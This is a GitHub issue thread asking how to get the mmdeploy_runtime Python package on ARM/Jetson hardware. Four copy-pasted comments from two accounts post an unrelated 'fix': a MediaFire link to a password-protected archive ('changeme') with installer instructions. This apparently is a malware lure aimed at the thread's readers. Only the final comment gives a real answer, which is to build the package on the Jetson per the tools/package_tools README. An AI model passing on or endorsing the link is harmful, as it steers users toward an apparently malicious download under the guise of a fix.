### ISSUE TITLE
[Feature] mmdeploy_runtime package support for arm platforms

### ISSUE THREAD

**Issue by lishuwei10** [open-mmlab/mmdeploy#2820]
### Motivation

I would like to build a TensorRT based multi-model project on the Jetson platform. I tested and succeeded in this process on the x86_64 platform, using the python API of the mmdeploy_runtime package
For example 
```
from mmdeploy_runtime import Detector
from mmdeploy_runtime import PoseDetector
```
But I noticed that the pre-compiled mmdeploy_runtime package doesn't support arm architecture, is there a way for me to compile this package on Jetson platform? Or is there any other way to implement this project? Thanks for help 🙏.

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by JNaranjo-Alcazar** [comment]
hello! 
I am facing the same problem. What is the solution?

Thanks in advance

**Comment by cg3dland** [comment]
You have to build the mmdeploy_runtime/mmdeploy_runtime_gpu by yourself on Jetson platform, please refer to the README under tools/package_tools.
